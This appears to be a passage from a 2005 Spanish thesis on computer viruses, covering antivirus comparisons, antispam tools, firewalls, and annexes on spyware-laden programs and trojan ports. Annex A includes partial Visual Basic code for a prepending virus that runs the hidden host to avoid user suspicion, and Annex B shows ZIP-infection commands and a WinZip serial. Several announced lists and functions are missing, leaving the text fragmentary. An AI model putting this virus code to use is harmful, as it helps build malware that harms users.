pruebas de detección, fruto de sumar la potencia de AVP y F-Prot en sus análisis.
Se ha apreciado una mejora en la velocidad a la hora de escanear grandes
colecciones de virus, donde en comparaciones pasadas era particularmente lento.
En el apartado de compresión recoge los frutos del motor de AVP que incorpora.
No ha destacado en ninguna de las pruebas de soporte, no contempla la potencia
heurística que llega a demostrar AVP en su producto, y llama la atención la
ausencia de un módulo específico para Internet que hace que caiga en los
resultados de este apartado.
El costo final del programa es algo elevado. Si se compara con el resto, puede
llegar a valer el doble de cualquier otro sistema antivirus. El soporte y la
actualización de producto son muy buenos. Para actualizarlo, es necesario
conectarse a Internet (Montesino, 2005)44.
119
8.5.7 PC-cillin. Es la solución para estaciones de trabajo Windows que propone
Trend Micro, una multinacional conocida por la calidad de sus soluciones antivirus
en el terreno de los servidores, toda una garantía para los usuarios domésticos.
Junto con el software, el usuario accede al servicio de actualizaciones de
patrones de virus y motor antivirus, puede inscribirse en un servicio de noticias
sobre virus junto con un calendario mediante un Active Desktop que le
mantendrá informado en todo momento.
Sin embargo, el resultado en el resto de pruebas fue discreto; quedó en los últimos
lugares en la prueba de instalación en un sistema infectado, no consiguió detectar
la muestra en el apartado de heurística, y se detectaron algunos problemas en el
módulo de análisis por Internet, en especial cuando se realiza a través de un
proxy por puertos no estándares (Hispasec, 2005)33.
120
Por otra parte, el Virus Wall es capaz de analizar en tiempo real el tráfico SMTP y
FTP para buscar virus. Evidentemente, este análisis debe combinarse con el
análisis heurístico durante el rastreo de un posible virus, pero, para entonces, no
será necesario el análisis de patrones. PC-Cillin es un producto a considerar
cuando conviven equipos UNIX y Windows 2000 dentro de una empresa
(Montesino, 2005)44.
8.5.8 AVP. Fabricado por Kaspersky Lab, el AVP, de origen ruso, es uno de
los productos más apreciados entre los entendidos por la potencia de su motor
antivirus en lo que toca a detección y desinfección. Junto con el software, se
obtiene soporte técnico por correo electrónico y actualizaciones diarias de las
bases de virus durante un año. AVP se destaca por presentar una de las
interfaces más sencillas y prácticas. A su ya conocida potencia como motor
antivirus, se suman unos resultados excelentes a nivel de soporte, al ser el
primero en aportar una solución para una infección por virus, así como ganar en la
contestación a una consulta realizada mediante el correo, en ambos casos con
tiempos de respuesta sorprendentes. Su peor resultado fue en el indicador de
asistencia telefónica (Hispasec, 2005)33.
8.6.1 Estado del arte de los antivirus como justificación para la creación de
un modelo híbrido. La protección ofrecida por un producto antivirus típico es
estática, lo que significa que la filosofía tras el producto es detectar y (algunas
veces) eliminar virus que los creadores del antivirus ya conocen. Sin embargo,
como se demostró claramente con la explosión de las infecciones de Melissa,
este método tiene su riesgo: mientras los computadores están cada vez más
interconectados, aumenta la capacidad para expandirse de los virus que se
propagan mas rápido que los procesos de detección y remoción. Con este
propósito muchos vendedores de antivirus han adicionado la característica de
detección de virus “desconocidos” a sus productos. Hay muchas sub-clases de
esta detección de virus genérica, cada una con sus fortalezas y debilidades. Sin
embargo, algunos aspectos son universalmente ciertos:
121
La detección de virus conocidos es mas confiable cuando se trata con virus ya
conocidos. Por lo tanto, no es muy probable que las técnicas genéricas
reemplacen a los scanners basados en características específicas del agente de
infección.
Las técnicas genéricas no deben marcar como infectados archivos que están
“limpios”. Tal confusión (conocida como falsos positivos) puede darle tanto trabajo
al usuario como una infección real, dado que la muestra debe ser capturada y
enviada al distribuidor de antivirus. El vendedor debe entonces explícitamente
excluir el archivo de la detección, o cambiar el sistema entero de detección para
que ese archivo (y archivos similares) no sean marcados por error. Se puede
concluir entonces que las técnicas genéricas son más efectivas como
complemento y no como reemplazo de las técnicas tradicionales.
Por lo tanto, la próxima generación de productos antivirus debe ser capaz de tratar
con los virus conocidos y desconocidos que lleguen a determinado host. El virus
debe ser detectado de alguna manera y cuando sea posible y deseable, ser
curado. Además cualquier otro computador que encuentre el mismo virus debe
ser capaz de identificar el virus inmediata y exactamente.
8.6.2 Modelo Hibrido. Estos son los componentes que el sistema hibrido
propuesto debe tener:
122
Con ese fin, el software que tiene una combinación de técnicas de detección de
virus debe presentarse en el equipo del usuario. Como mínimo estos deben
consistir de uno o más de los siguientes:
Una situación típica con el rango actual de productos es que una nueva muestra
pueda ser detectada por la heurística de un producto. Actualizaciones
subsecuentes del producto le proveen al scanner una marca con la que puede
identificar el mismo virus. Por lo tanto, de alguna forma es de naturaleza transitiva.
Debe considerarse también un producto cuya detección heurística lleve a un falso
positivo—una actualización de la heurística puede llevar a que la heurística en un
nuevo producto no tenga virus que ya fueron detectados.
123
La detección pre-infección es también importante cuando se consideran algunos
de los virus de infección de archivos más complejos, especialmente aquellos que
específicamente infectan archivos ejecutables portátiles de Windows. La
desinfección de los archivos infectados con este tipo de virus es una cuestión
compleja. Aparte del hecho que algunos virus se caracterizan por corromper
archivos en el momento de la infección, hay muy poca seguridad en confiar en una
desinfección de un producto antivirus para que restaure este tipo de archivos
exactamente.
Hay varias capas de un sistema autómata que podrían se atacadas por un virus,
empleando una de varias técnicas diferentes. Primero, el sistema puede ser
atacado directamente por un virus. En este tipo de ataque, el autor del virus
intentaría derrotar al sistema en el lado del cliente, desarrollando virus que evadan
técnicas heurísticas de detección de virus, o simplemente deshabilitando
totalmente al cliente. Aunque estos efectos son importantes para predecir y tomar
medidas para prevenir, no son nada nuevo; es de notar aquí un ataque masivo a
un sistema híbrido. En el caso de un sistema híbrido que emplee clientes
inteligentes que envíen información a un hub central para su distribución, la forma
más posible de ataque sería una característica de de impacto directo.
124
9. PROGRAMAS DE SEGURIDAD
Cada día una cantidad descomunal de mensajes no solicitados inunda las casillas
de correo electrónico y pone en peligro a una herramienta que ya es vital para
millones de personas en todo el mundo. Mientras los distintos gobiernos se
deciden a adoptar medidas legales y la industria del software antispam da sus
primeros pasos, los usuarios desprevenidos tienen que hurgar entre montañas de
correo basura para encontrar un mensaje genuino.
125
9.3 SOFTWARE ANTISPAM COMO HERRAMIENTA EN LA LUCHA CONTRA
EL SPAM
Las medidas para combatir el Spam se desarrollan en tres ámbitos diferentes. Por
un lado, los distintos gobiernos están encarando el problema de brindar un marco
legal para contener el Spam. En el plano tecnológico, la industria del software
está desarrollando distintas herramientas para filtrar el correo basura. En el ámbito
del usuario, por último, hay distintas medidas que pueden ayudar a combatir o
reducir el ingreso de correo basura.
SpamNet: permite a los usuarios de Outlook que toda vez que un usuario indica
como spam a un determinado mensaje, esa información sea enviada a las bases
de datos de Cloudmark. Una vez que una determinada cantidad de usuarios
identifican a una dirección de mail como Spammer, ésta pasa a formar parte de
una lista negra con información compartida por todos los usuarios del programa.
126
Figura 7. Ubicación de un Firewall
Los Firewalls en Internet administran los accesos posibles del Internet a la red
privada. Sin un firewall, cada uno de los servidores propios del sistema se
exponen al ataque de otros servidores en el Internet. Esto significa que la
seguridad en la red privada depende de la “Dureza” con que cada uno de los
servidores cuenta y es únicamente seguro tanto como la seguridad en la fragilidad
posible del sistema. El firewall permite al administrador de la red definir un “choke
point” (envudo), manteniendo al margen los usuarios no-autorizados (tal, como.,
hackers, crakers, vándalos, y espías) fuera de la red, prohibiendo potencialmente
la entrada o salida al vulnerar los servicios de la red, y proporcionar la protección
para varios tipos de ataques posibles. Uno de los beneficios clave de un firewall
en Internet es que ayuda a simplificar los trabajos de administración, una vez que
se consolida la seguridad en el sistema firewall, es mejor que distribuirla en cada
uno de los servidores que integran nuestra red privada.
127
9.4 LIMITACIONES DE UN FIREWALL
128
Los Firewalls (sistemas o combinación de sistemas que fijan los límites entre dos
o más redes y restringen la entrada y salida de la información) son parte esencial
de cualquier solución de seguridad en redes y para proporcionar la máxima
protección contra ataques, a la vez que permiten soportar aplicaciones
innovadoras, es importante que estos equipos actúen como parte de todo un
sistema integral de seguridad. En definitiva, un firewall (barrera de protección o
procedimiento de seguridad que coloca un sistema de cómputo programado
especialmente entre una red segura y una red insegura, pudiendo ser ésta última
Internet pues es considerada siempre una zona peligrosa) es un complemento al
resto de medidas corporativas que se han de tomar para garantizar la protección
de la información y que han de contemplar no solo los ataques externos, sino
también los internos, que puede realizar el propio personal, así como todas
aquellas aplicaciones que están instaladas y que pueden tener agujeros o huecos
significativos por los que se puedan colar los intrusos.
129
organización o empresa, sirven para detectar actividades inapropiadas, incorrectas
o anómalas desde el exterior o interior de todo un sistema informático). En este
contexto es como se nos presentan los Honeypots como alternativa -además de
adicional- bastante útil como una medida eficaz que nos permita afinar nuestros
criterios de seguridad corporativa e incluso con el tiempo poder ir contribuyendo a
la evolución y desarrollo de estándares internacionales de seguridad.
Los nombres de los archivos que corresponden con estos programas no suelen
dar una idea de su verdadera naturaleza, por lo que pueden pasar desapercibidos
entre otros archivos de una aplicación.
130
10. CONCLUSIONES
• Los usuarios no solo son victimas de los creadores de código nocivo, existen
otras formas de software “indeseable” con las que tienen que tratar a diario, se
presentan como el ejemplo más obvio el spyware y el spam que son el
resultado del afán de las grandes corporaciones por obtener información sobre
el usuario para actualizar sus bases de datos y ampliar su mercado.
131
• Los sistemas Linux no son blanco frecuente de los ataques con código nocivo
debido a la mayor popularidad que tienen los sistemas Windows, su
contraparte. Dado que el creador de código nocivo busca reconocimiento y
popularidad es lógico que escoja el sistema más usado como blanco de sus
ataques.
• Analizando los tipos de virus y sus clasificaciones se puede esperar que sus
técnicas y definiciones sigan multiplicándose, debido a que la naturaleza del
virus creado depende solo de la creatividad de su creador a la hora de
programar diferentes tipos de ataque y nuevas formas de propagación.
132
BIBLIOGRAFÍA
9. CANTO, Julio. Vulnerabilidad en rama 2.6 del kernel de Linux por problema con
routing_ioctl(). Obtenida en Septiembre de 2005, de
http://www.hispasec.com/unaaldia/2525
10. Cibernauta. La III Campaña de Seguridad ofrece una solución antivirus para
dispositivos PDA. Obtenida en Septiembre de 2005, de
http://www.cibernauta.com/cibertecno/cibertecno_software_articulos.php?articulo=
3566.php
133
12. Comunicaciones World. La industria prepara un nuevo estándar de seguridad
para móviles. Obtenida en Octubre del 2005, de
http://www.aecomo.org/content.asp?contentid=3900&contenttypeid=2&catid=150&
cattypeid=2
15. CORREA, Sergio. WAP: Tierra virgen para hackers. Obtenida en Septiembre
de 2005, de
http://www.hipermarketing.com/nuevo%204/contenido/tecnologia/telecomunicacion
es/nivel3wap.html
19. El Hacker. Básicamente ¿Qué son los Troyanos?. Obtenida en Julio de 2005,
de http://www.elhacker.org/index.php?Ver=Articulo&Id=129
22. El PAIS, Operadoras y fabricantes intentan blindar los móviles ante la llegada
de virus. Obtenida en Septiembre de 2005, de
http://www.aecomo.org/content.asp?contentid=3859&contenttypeid=2&catid=150&
cattypeid=2
134
24. Falckon. Infección de ejecutables bajo VB. Obtenida en Septiembre de 2005,
de http://zod.com.mx/~gedzac/ezine/mitosis2.zip
30. GORDON, Sarah. Antivirus Software Testing for the New Millenium. Obtenida
en Octubre de 2005, de
http://csrc.nist.gov/nissc/1996/papers/NISSC96/paper019/final.PDF
31. HERNÁNDEZ, Claudio. Hackers los piratas del chip y de Internet. Obtenido en
Junio de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=38
32. HERRANZ, Arantxa. Los virus para móviles. La punta del iceberg de mayores
amenazas. Obtenida en Septiembre de 2005, de
http://www.idg.es/dealer/actualidad.asp?id=43372
34. IBLNEWS, Agencias. Los hackers sitúan su próximo objetivo en los teléfonos
móviles. Obtenida en Septiembre de 2005, de
http://iblnews.com/noticias/02/123917.html
35. IÑAKI, Urzai. Los virus del pasado y del futuro. Obtenida en Septiembre de
2005, de
http://www.windowstimag.com/atrasados/2004/87_mai04/articulos/firma_3.asp
135
36. kaspersky. Protección para PDAs. Obtenida en Septiembre de 2005, de
http://www.kaspersky.com.mx/prod.corp.pdas.html
38. Machado, Jorge. Breve Historia de los virus informáticos. Obtenida en Junio
de 2005, de http://www.perantivirus.com/sosvirus/general/histovir.htm
46. MORENO PÉREZ, Arnoldo. Los virus en los PDAs. Obtenida en Septiembre
de 2005, de http://www.virusprot.com/Art35.html
47. Morgan. El spyware Que es, como funciona y como evitarlo. Obtenida en
Septiembre de 2005, de http://www.elhacker.org/index.php?Ver=Articulo&Id=280
136
48. MORLANS HERNANDEZ, Karel. SCHAPACHNICK, Edgardo. BARRETO,
José. Virus hoax. Obtenida en junio de 2005, de
http://www.fac.org.ar/scvc/help/virus/viresp.htm#Virus%20Hoax
50. Mouse. Virus para celulares también afecta a PCs. Obtenida en Septiembre
de 2005, de http://www.mouse.cl/detail.asp?story=2005/09/23/17/58/17
137
60. SAAVEDRA, Karina. Cuál es el futuro de los virus en este 2005. Obtenida en
Septiembre de 2005, de
http://microasist.com.mx/noticias/internet/ksoin110105.shtml
63. Virusprot.com. Historia de los virus, capitulo I Los orígenes de los virus.
Obtenida en junio de 2005, de http://www.virusprot.com/Historia1.html
65. Virusprot.com. Historia de los virus, capitulo III 1989, El año de la avalancha.
Obtenida en junio de 2005, de http://www.virusprot.com/Historia3.html
69. Virusprot.com. Historia de los virus, capitulo VII 1993, Virus y máquinas
polimórficas. Obtenida en junio de 2005, de
http://www.virusprot.com/Historia7.html
138
ANEXO A. INFECCION DE EJECUTABLES
Un virus prepending mueve los bits y bytes del host hacia al final posicionando
en primer lugar los bits y bytes suyos, de esta forma el virus toma el control de
todo el host, ejecutandose primero.
Con la siguiente función que será llamada desde el código del virus, se llamara
pasándole una carpeta, la cual devolverá una variable con todos los ejecutables
separados por el siguiente signo:"|" (sin comillas):
139
- Infectando ejecutables
El siguiente paso será infectar los archivos que se hayan sacado con la función
anterior, esta función se llamara de la siguiente forma:
140
la variable que contiene el virus, seguido del host y la firma. la estructura del
nuevo ejecutable deberá quedar de esta forma:
[Virus]
[ HOST]
[FIRMA]
- Regenerando el host
Es de pensar por muchas personas que uniendo un ejecutable con otro, los dos se
ejecutan, pero esto es falso, siempre el que esté de primero será ejecutado, el
otro no, así que se tiene que buscar la forma de pasar el control al host para así
no dar sospechas al usuario de que a ejecutado un virus (Este odigo es solo
una introducción y aquí no se maneja API's para la identificación de las ventanas
y así eliminar el archivo cuando es cerrado etc.)
Sub regenerando(ejecutable)
Dim host2 As String
Dim virs As String
Open ejecutable For Binary Access Read As #1
virs = Space(24576) '<- tamaño en bytes del virus, para sacarlo compilar
'el ejecutable y ver en propiedades
host2 = Space(LOF(1) - 24576) '<---se le resta el tamaño del virus a todo el host
'para que quede solo el ejecutable
Get #1, , virs
Get #1, , host2
Close #1
Dim xx, fso As Object
Randomize
xx = Int(Rnd * 100000)
Set fso = CreateObject("Scripting.FileSystemObject")
Open fso.GetSpecialFolder(2) & "\" & xx & ".exe" For Binary Access Write As #2
Put #2, , host2
Close #2
Dim aa
aa = Shell(fso.GetSpecialFolder(2) & "\" & xx & ".exe")
End Sub
Lo primero que se hara será abrir el exe y leer el host, se randomiza un número
aleatoria mente, se llama al objeto FSO para sacar el directorio TEMP, se crea
ahí un archivo binario nuevo y se le escribe lo previamente leído, y por ultimo se
ejecuta.
141
- instrucciones imprescindibles para el correcto funcionamiento del virus
- Algunos Términos:
142
ANEXO B. INFECCION DE ZIP’s
HKLM\Software\Microsoft\Windows\Currentversion\Uninstall\Winzip\UninstallString
Winzip = fso.GetParentFolderName(Direcciondewinzip)
- Algunos Comandos:
Shell Winzip & " -a " archivozip & " " & archivoexe
143
-Extraer Archivos:
Shell Winzip & " -e " & archivozip & " " & directorio
Sólo Abre un archivo de modo binario y cierralo, es todo, nada mas que con
extensión zip.
- La infección:
144
- Registro de Winzip:
Donde:
Name = "Nombre del registrado"
SN = "Numero de serie o Serial Number"
Ejemplo:
Name = "NOMBRE"
SN = "EBB9042E"
145
ANEXO C. PROGRAMAS CON SPYWARE
Cydoor
Abe's MP3 Finder HumanClick
AccessDiver iPhone
Angove CD Player Iper3
Ashampoo Uninstaller Lines98´/Lines Milenium
Audio CD MP3 Studio 2000 Locker4U
Babylon MatchBlox
Blinkin MoNooN3DR
Cash 2000 Monsters & Mayhem
Challenge Pool MP3 TagStudio
CD Recording Studio Online Call
CD Box Labaler Pro Othello FX
Connect Four PC-to-Phone
Contact Plus PostCryptum
Cowon Jet-Audio Photo Base Junior
Crosses & Zeroes Picture Line
Disconnector Quickhead-E
Dope Wars QMS Memory Squares
EldoS Keeper QMS Mystery of Magical
eLOL(Electronic Laugh Out
Loud) Numbers
EasyFill 2.02 ReGet
Easy Phone Book SeaWar
EzStock Sign Language Teacher
File Mentor Spam Buster
FindShare Speak Light
FreeBase Stats 99
Free MP3 SuperBot
Free Pics Task Plus
Free Tetris The Dictator
GenoPro Toag
GetDown ToasterMultiTester
GodeZip Virtual Friend
Html Tutor pro Vocabulary Wizard
Implosion screen saver YellowBase
In Vircible Anti Virus Zip Wrangler
3D Morris
EverAd
CuteFTP QuoTracker
Graph Paper Printer ReGet
146
Lines98 Shapez!
Mindjongg Vocabulary Wizard
Mixman Studio 100% Word Search Free
PlayJ Studio
Web3000
Afreet SiteViewer Kmail
An Online Secretary Kmp3
AOL Anti-Timer Maxiimus
Ariadne Browser Media Player
Auction Station My To Do
Beeline Netcaptor
Bio-Rhythms NetMonitor
Buddy Pad NetSonic
Calendar+ NotePad+
Calendar+ 2000 Password Manager
CD Extractor PCDJ
Email Extractor ShellGem
EpAssist SpyTech
EZSurfer 2000 Time Manager
eWork S TypeItIn
File & MP3 Renamer Validate CC
GenoPro Web Resume Wizard
GPL WebSurfAce
Gimme IP Web Word Wrestle
HiClock 100 Proof Cocktail Planner
JSoft Mail !Glance
KFK 1st Contact
KFTP
DSSAgent
Mattel Retail products TimeWarner software
Radiate
Aaron's WebVacuum 0.8f MP3 Renamer 1.33
Abe's FTP Client Mp3 Stream Recorder 2.3
Abe's Image Viewer 1.1 MultiSender 1.03
Abe's MP3 Finder 4.0 Music Genie 1.0
Abe's Picture Finder 1.4 MX Inspector BIG AD
Abe's SMB Client My Genie Sports Edition 2.5
Absolute Telnet 1.63 My Genie Patriots
Access Diver III My Genie SE
Ace of Humor 1.0 My GetRight 1.0
AceNotes Free 2000c NeatFTP 1.0
Acorn Email 2.5 Net CB 1.0
147
ActionOutline Light 1.6 NewsShark
Active 'Net 1.0 Net-A-Car Feature Car
AcqURL 3.1 Screensaver
Add/Remove Plus! 1.1 NetAnts
Add URL 1.0 NetBoard
Address Rover 98 Netbus Pro 2.10
Admiral VirusScanner 1.0 NetCaptor 5.0
Advanced Call Center 2.9 Netman Downloader 1.0
Advanced Maillist Verify 1.6 NetMole 1.0
Advanced internet Tool 2.2.2 NetNak 4.2
Advertisement Wizard Net Scan 2000
AdWizard NetShark 1.0
Alchemy Anaconda NetSuck 3.10.5/3.1
Alive and Kicking 3.1 NetTime Thingy 1.5
AllNetic WWW and FTP
Observer Net Vampire 3.3
AlphaScape QuickPaste NeuroStock
AnchorNet1 NewsWire 1.5
Applet Game Mania 1.7 Network Assistant 1.9
ASP1-A3 1.0 NetXtract
Auction Central 1.02 NeuroStock
Auction Explorer NfoNak 4.1
AutoFTP PRO 2.3 NikNak 2.0.1
AutoWeb 1.0 NotePads+ 2.0
Aureate Group Mail 3.0 Notificator 1.01b
Aureate SpamKiller Free
Edition Octopus 3.0
AxelCD 2.1 OfTheDay Creator 1.0
AxMan OfTheDay Quizzer 1.1
Beatle OnlineCall 1.19
bigEListener Option Insight 0.6.2
Binary Boy 1.70 123Search
BinaryVortex 1.4 123Search 2
BizAgent 1 15 Puzzle 2.1
Blue Engine 1.0 1 ClickWebSlideShow
BookSmith : Original 1.2 20/20
BuddyPhone 2.0 5star Free Lines 1.2'
Bullseye Searcher 2.5 7way 0.15
Calypso E-mail 3.0 Paint by numbers
CamCollect 1.4c Pattern Book 1.0.02
CamGrab PerfectPartner-Time&Billing
Canasis vB vB-Beta (Demo)2.0
Capture Express 2000 1.0 Personal internet Finder 1.7
Car Lot Web Site Creator 1 Personal Search Agent .8
Carlanthano 2.9.868 People Seek 98
148
Cascoly Screensaver 1.0 PGNSetup
CD-AID 02.00.05.23 Photocopier 2.0
CDDB-Reader PicPluck 2.0
CDMaster32 3.0 Pictures In News 1.0
Centarsia 1.01 PingMaster
ChanStat 3.3 Ping Thingy
Charity Banner 1.0 Pixel Pirate 1.0
Cheat Machine 3.1 Planet.Billboard
Check&Get 1 Planet.MP3Find 3.0
Check4New 1.7 PMS
ChinMail 1.2 ponnu CHAMY's Music
Clabra clipboard viewer 1.2 PopMon 1.0.0.1
Classic Peg Solitaire 1.0 Popup Dictionary 2.0.70
ClipMate5-Student Edition PowerPak Accounting and
Clock Saver 1.0 Inventory Management-Demo 2
ComTry Music Downloader
2.2 PrePromote 1.0.0
Concentration Done Right 1 PromaSoft Autoresponder
Connection Watcher 4 10.732
Crystal FTP 2000 ProtectX 3.0
CSE HTML Validator Lite ProxyChecker
CuteFTP 3.0/3.5 Q*Wallet 1.6
CuteFTP 3.0 beta QuadSucker/Web 1.8
CuteFTP/Tripod Quadzle Puzzles
CutePage 2.0 QuikLink Autobot
CuteMX QuikLink Explorer
CutePage QuikLink Explorer Freeware
Danzig Pref Engine 1 1 Edition 3.0
DateTime 1.3 QuikLink Explorer Gold Edition
Desk Reference 0.1 3.0
Delphi Component Test Quta
Delphi Tester Quote Ticker Bar 6.0
Dialarm 1.0.1.19 QuoteWatch 4.2
Dialer 2000 1.5 Quo Tracker 1.1.48
DigiBand NewsWatch Real Estate Web Site Creator
Digi-Cam Web Page
Generator 1.0
DigiCams - The WebCam
Viewer 1.0 ReallyEasy interactor 3.0(1)
Digital Postman 2.0 RealReverb Convolution 1.3
Direct Connect 0.9.963 Recipe Review
DirectUpdate Rededit
diskSpace explorer 2000 2.1 ReGet 1.6
DL-Mail Pro 2000 Remoteshut
Doorbell 1.18 Rename Master
149
DownloadAgent Rest Your Eyes 3.0
Download Minder 1.5/1.8 Resume Detective 1.5
DownLoader 1.1 RingSurf
Download Wonder 1.55 RoboCam 1.10
dozeCrypt III Rosemary's Weird Web World
DuRu 1 Rosoft CD Extractor 1.09
Dwyco Video Conferencing
2.3 Rosoft Media Player.1
eAssist SaberQuest Page Burner
EasySeeker 4.0 SaberQuest Tag Specification
Easy Splitter 1 Edit
EIS Web Monitor 1.2 Savings4u 1.0 Beta 3
Email Extractor'99 2.92 SBJV 3.0
Encoding Utility 2000 SBWcc 2.0
EnvoyMail Scout's Game 1.0
EURO Converter 2 scout's Game 1.02.1
Everylink for You 2000 ScreenFIRE 3.0
EVocabFlashCard 1.0 ScreenFIRE - FileKing
Executive Accounting-Demo ScreenFlavors
Express Communicator 1 Scripto .80
EZ-Forms FREE Sea Battle 1.0
File&MP3 Renamer'99 SERanker 1.24
File Mag-Net 3.0 Shapez! 1.0
FileSeeker Shizzam 2.6
FileSender SimpleFind 1.0
FileSplit 2.2 Simple Submit 1.0
Fire Client 1.5b1100 SiteBack
FlashGet (Formerly JetCar)
0.87 SiteChecker
FloorplanLT Sitesniffer 1.0
Folder Guard Jr. 4.1 Skeek Shooting 1.1
FormToolLT SK-111
FourTimes 3.5 SLEdit
Frazzle Slide Puzzle 1.00
FreeBudget SmartBoard 200 FREE Edition
Free Hearts for Windows 1 2.6
FreeImageEditor 1.0 Smart 'n Sticky
FreeIRC 1.0 SmartSum Calculator 2.0
FreeNotePad 1.0 Snap-It 4.0
Free Picture Harvester Snipsnap 2.0
FreeSaver MP3 1.0 SoftCuisine 2 2.0
FreeSite 1.0 SonicBurn 1.3.178
Free Solitaire 3.0 SonicMail 2.6
Free Spades .7 Sound Agent 1 0
FreeSubmit 1.0 Space Checker
150
Free Submitter Pro Space Central Screen Saver
FreeWebBrowser 1.0 Speaking Email Deluxe 5.5.0
FreeWebMail 1.0 Splash! Siterave
FreeZip! 2.0 Spherical HTML-Templator
FTPEditor 1.7 Spherical MP3INFO-Editor 1.0
Fundi e-Lert 1.4.1.29 StartDrive 1.0
GenoPro 1.71 Static FTP
GetRight 4.1 StationRadio
GetRight 4.2 c StockBrowser 1.9
GetRight Mail Control 1.0 Subscriber
Gif Animator 1.00 SunEdit 2K
GifLine Pro 2.0.2 SunEdit 2k Mod Manager
GovernMail SunKoSoft WebNewser 1.0b
Go!Zilla 3.5 SuperIDE 1.4
Go!Zilla WebAttack Sweep 1.4
Gomoku Pro 1.1 SweepsWinner
GovernMmail 1.1 Text Transmogrifier
Grafula 1.2 The Cassette Tape Producer
Gunther's PasswordSentry 4.0.6
HangWeb The Receptionist Desktop
Hey.Beer.Man Edition 5
hesci Private Label The Star Wars Combine
Host Monitor 4 HoloCom
HTML Translator 2.5 The Mapper
HTTP Proxy-Spy TheNet 3.69
Huey v1.8 Color Picker 1.8 Tic-Tac-Toe Done right
HyperSnap-DX3.61 TIFNY 3.0
iAgent 1.0 TI-FindMail 2.0
Iban Technologies IP Tools
2000 3.1 too Many Secrets 0.0.6 beta
Ice Fusion Total Finger 1.3
Idyle GimmIP 4/4.00 Total Whois 2.0
iFind Graphics 1.5 Tracking The Eye 1999
imageN Trade Site Creator 1.1
ImagerX2000 3.0 Traffic Attractor 2000 4
Infinite Patience 2.2 Triangle Puzzle 1.00
InfoBlast Trivialnet 0.60
InnovaClub TUCOWS Uploader 2.11
In School We Trust (Pupil
Edition) twinExplorer 2.5
InstallZIP 1.4 TWinExplorer Standard
iNetPad 3.1 TypeWriter 1.0
Interchange FTP 0.2.1 3rd block 2.0
InterFax 6.0.0 3d Anarchy
Internet Tree 2.0 3D-FTP 3.0
151
Internetrix 1.0 3S Accounting
InterWebWord Companion 3SI Accounting&Inventory
Invisible Secrets 2.0 Management (Demo) 2.0
IP-Turboscanner UdmSearch 3.0..11.2
iToday UK Phone Codes
Iwan's MP3 Finder 1.1 Vagabond's Realm 0.9.1
IYSoft Dial-Up Connection 1.2 VeriMP3 1.0
JetCar Veritape 1.3
JFK Research Vertigo QSearch
jIRC Virtual Access 5.0
JOC Email Checker 1.7 Visual Surfer 1.4
JOC Web Finder VOG Backgammon Main 2
JOC Web Spider 2.6 VOG Backgammon Table
JPEG Optimizer 3.07 VOG Chess 2
JrEdit 1 VOG Chess Main
JOC Web Spider VOG Chess Table
Kachat Messenger Visual Cyberadio
Keyword Monitor 1 VOG Reversi Main
KVT Diplom VOG Reversi Table
LapLink FTP 2.0 VOG Shell
Laser Chess 1.0 VOG Shell History
LinkProver 2.0 W3Filer(32) Up/Downloader -
LineSoft Download Internet Files 3.1.3
LOL Chat 2.5 WarrenView 1.0
Magellan explorer 2.2 'WE' Group ProxyChecker 3.1.8
Mail Them WebBug
Manifest Timetrap 3.0 WebCamVCR 1.0
Marker 1.1 WebCam Wonder 1.0
Meracl FontMap WebCopier 1.3
MASH-The Microsoft Agent Web Coupon 1.0
Scripting Helper 4.5.3 WebDrive 3.0
MasterCrypt 2.0 Web Database
Match It 1.0 WebHunt 2.8
Maxxchat 1.0 B-6 Webman 5.3
Meeting Planner 0.8.0.1 Web-N-Force 1.7
MegaSafe 6 Web Page Authoring Software
MemriC 1.0 WebReaper 8.0
Meracl FontMap 1.2 Web Registrant PRO 4.0
Meracl Hexocol 1.1 Web Resume 1.0
Meracl ID3 Tag Writer WebSaver
Meracl ImageMap Generator
3.4 Website Manager
Meracl MD Recorder 1.0 Web SurfACE 2.0
MetaMan WebStripper 1.05
Midnight Oil Solitaire 3.1 Web Word Search 1.0
152
MillenniuM BReaThe beta
0.3b WebZip 3.5
MiniMemo-Die
Cheatsdatenbank 9.0 WEB2SMS 1.0
MirNik Internet Finder 1.0 WebType 1.0
MonIRC 1.0.0.2 WhoIs Thingy
MoonWalker 2000 2.0.0 Win A Lotto
More Space 99 3.1 WinEdit 2000
MouseAssist-awaiting final
approval WinMP3Locator
MP3 Album Finder 1.3 Word+
MP3 Cat 1.0 Wordwright 1.0
MP3 Fiend 5.5 WorldChat Client
MP3 Grouppie 4.5 Worm
MP3INFO-Editor W3Filer
MP3 Mag-Net 1.0 www.devgames.com
MP3 Player 2000 6.2 xBlock 1.2
Your ESP Test
Zarko 1.9
Zarko3D
Zip Express 2000
Zip Up The Web Pro!
Zion 1.51
(Morgan, 2005)47.
153
ANEXO D. LISTADO DE PUERTOS POR LOS QUE SE COMUNICAN LOS
TROYANOS
port 22 Shaft
port 23 Fire HacKer, Tiny Telnet Server - TTS, Truva Atl
port 25 Ajan, Antigen, Barok, Email Password Sender - EPS, EPS II, Gip, Gris,
Happy99, Hpteam mail, Hybris, I love you, Kuang2, Magic Horse, MBT (Mail
Bombing Trojan), Moscow Email trojan, Naebi, NewApt worm, ProMail trojan,
Shtirlitz, Stealth, Tapiras, Terminator, WinPC, WinSpy
port 81 RemoConChubo
port 99 Hidden Port, NCX
port 110 ProMail trojan
port 113 Invisible Identd Deamon, Kazimas
port 119 Happy99
port 121 Attack Bot, God Message, JammerKillah
port 123 Net Controller
154
port 133 Farnaz
port 137 Chode
port 137 (UDP) - Msinit
port 138 Chode
port 139 Chode, God Message worm, Msinit, Netlog, Network, Qaz
port 142 NetTaxi
port 146 Infector
port 146 (UDP) - Infector
port 170 A-trojan
port 334 Backage
port 411 Backage
port 420 Breach, Incognito
port 421 TCP Wrappers trojan
port 455 Fatal Connections
port 456 Hackers Paradise
port 513 Grlogin
port 514 RPC Backdoor
port 531 Net666, Rasmin
port 555 711 trojan (Seven Eleven), Ini-Killer, Net Administrator, Phase Zero,
Phase-0, Stealth Spy
port 605 Secret Service
port 666 Attack FTP, Back Construction, BLA trojan, Cain & Abel, NokNok, Satans
Back Door - SBD, ServU, Shadow Phyre, th3r1pp3rz (= Therippers)
port 667 SniperNet
port 669 DP trojan
port 692 GayOL
port 777 AimSpy, Undetected
port 808 WinHole
port 911 Dark Shadow
port 999 Deep Throat, Foreplay, WinSatan
port 1000 Der Späher / Der Spaeher, Direct Connection
port 1001 Der Späher / Der Spaeher, Le Guardien, Silencer, WebEx
port 1010 Doly Trojan
port 1011 Doly Trojan
port 1012 Doly Trojan
port 1015 Doly Trojan
port 1016 Doly Trojan
port 1020 Vampire
